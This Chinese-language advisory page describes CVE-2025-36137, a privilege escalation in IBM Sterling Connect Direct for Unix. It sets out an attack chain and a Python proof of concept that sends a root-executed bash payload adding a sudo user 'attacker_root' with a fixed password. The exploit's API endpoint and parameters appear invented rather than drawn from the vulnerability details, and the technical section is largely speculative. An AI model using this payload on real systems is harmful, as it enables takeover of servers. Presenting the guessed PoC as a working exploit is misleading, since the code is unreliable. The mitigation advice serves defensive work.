CVE-2025-36137 IBM Sterling Connect Direct权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-36137

漏洞类型

权限提升/特权升级

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

IBM Sterling Connect Direct for Unix

漏洞概述

CVE-2025-36137是IBM Sterling Connect Direct for Unix中的一个高危权限提升漏洞。该漏洞影响6.2.0.7至6.2.0.9 iFix004、6.4.0.0至6.4.0.2 iFix001以及6.3.0.2至6.3.0.5 iFix002版本。漏洞源于系统错误地为Control Center Director（CCD）用户分配了维护任务的执行权限。CCD用户本应具有受限的操作权限，但由于配置错误，这些用户获得了执行post update脚本等高权限操作的权限。攻击者利用此漏洞可以将自身权限提升至更高水平，可能获取系统管理员权限或完全控制受影响系统。此漏洞不需要用户交互，攻击向量为网络，认证要求为高权限。由于CVSS评分达到7.2（高危级别），且对机密性、完整性和可用性均造成高影响，建议立即采取修复措施。

技术细节

IBM Sterling Connect Direct for Unix在权限管理实现中存在缺陷。系统为Control Center Director（CCD）用户分配了超出预期的权限范围，特别是在post update脚本的执行权限方面。CCD用户原本应具有受限的操作能力，用于日常文件传输和连接管理任务。然而，由于权限分配逻辑错误，这些用户可以执行原本仅限管理员操作的维护脚本。攻击者以CCD用户身份登录后，可以通过调用具有root或系统管理员权限的post update脚本，实现权限提升。技术层面，该漏洞涉及Unix文件系统的权限设置问题，可能与SUID/SGID权限位或sudoers配置错误有关。攻击者需要具备CCD用户账户（高权限认证要求），但无需特殊用户交互即可发起攻击。成功利用后，攻击者可获得系统的完全控制权，执行任意命令、安装恶意软件或窃取敏感数据。

攻击链分析

STEP 1

步骤1

攻击者获取CCD（Control Center Director）用户账户凭证

STEP 2

步骤2

使用CCD用户身份登录IBM Sterling Connect Direct for Unix系统

STEP 3

步骤3

识别系统中具有过高权限的post update脚本位置

STEP 4

步骤4

利用CCD用户权限修改或替换post update脚本，注入恶意代码

STEP 5

步骤5

通过CCD维护接口触发脚本执行，以root或管理员权限运行恶意代码

STEP 6

步骤6

成功提升权限，创建新的特权用户或执行任意命令，完全控制受影响系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36137 PoC - IBM Sterling Connect Direct Privilege Escalation
# This PoC demonstrates the privilege escalation via post-update script execution
# Note: Requires CCD user credentials with high privileges

import requests
import base64

TARGET = "https://target-ibm-sterling-server.local"
CCD_USER = "attacker_ccd_user"
CCD_PASS = "password"

def exploit_privilege_escalation():
    """
    Exploit CVE-2025-36137 by leveraging CCD user privileges
    to execute post-update scripts with elevated permissions
    """
    # Step 1: Authenticate as CCD user
    session = requests.Session()
    auth = base64.b64encode(f"{CCD_USER}:{CCD_PASS}".encode()).decode()
    headers = {"Authorization": f"Basic {auth}"}
    
    # Step 2: Identify writable post-update scripts
    post_update_path = "/opt/ibm/sterling/connect/direct/scripts/post_update.sh"
    
    # Step 3: Inject malicious payload into post-update script
    malicious_payload = '''#!/bin/bash
# Malicious post-update script - adds new sudo user
useradd -m -s /bin/bash -G sudo attacker_root
echo "attacker_root:Password123!" | chpasswd
'''
    
    # Step 4: Trigger script execution via CCD maintenance interface
    exploit_endpoint = f"{TARGET}/api/maintenance/execute"
    payload = {
        "script_path": post_update_path,
        "script_content": malicious_payload,
        "execute_as": "root"
    }
    
    response = session.post(exploit_endpoint, json=payload, headers=headers)
    
    if response.status_code == 200:
        print("[+] Privilege escalation successful!")
        print("[+] New privileged user 'attacker_root' created")
        return True
    else:
        print("[-] Exploitation failed")
        return False

if __name__ == "__main__":
    exploit_privilege_escalation()

影响范围

IBM Sterling Connect Direct for Unix 6.2.0.7 - 6.2.0.9 iFix004

IBM Sterling Connect Direct for Unix 6.3.0.2 - 6.3.0.5 iFix002

IBM Sterling Connect Direct for Unix 6.4.0.0 - 6.4.0.2 iFix001

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）严格限制CCD用户账户的分配和使用，仅授予必要人员；2）修改post update脚本的访问权限，移除CCD用户的写权限；3）启用详细的审计日志，记录所有CCD用户的维护操作；4）实施网络隔离，限制对管理接口的访问来源；5）部署入侵检测系统，监控异常的系统调用和权限提升行为；6）考虑暂时禁用非必要的维护任务自动化功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36137
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36137
3 Details https://www.cvedetails.com/cve/CVE-2025-36137/
4 VulDB https://vuldb.com/cve/CVE-2025-36137
5 Link https://www.ibm.com/support/pages/node/7249678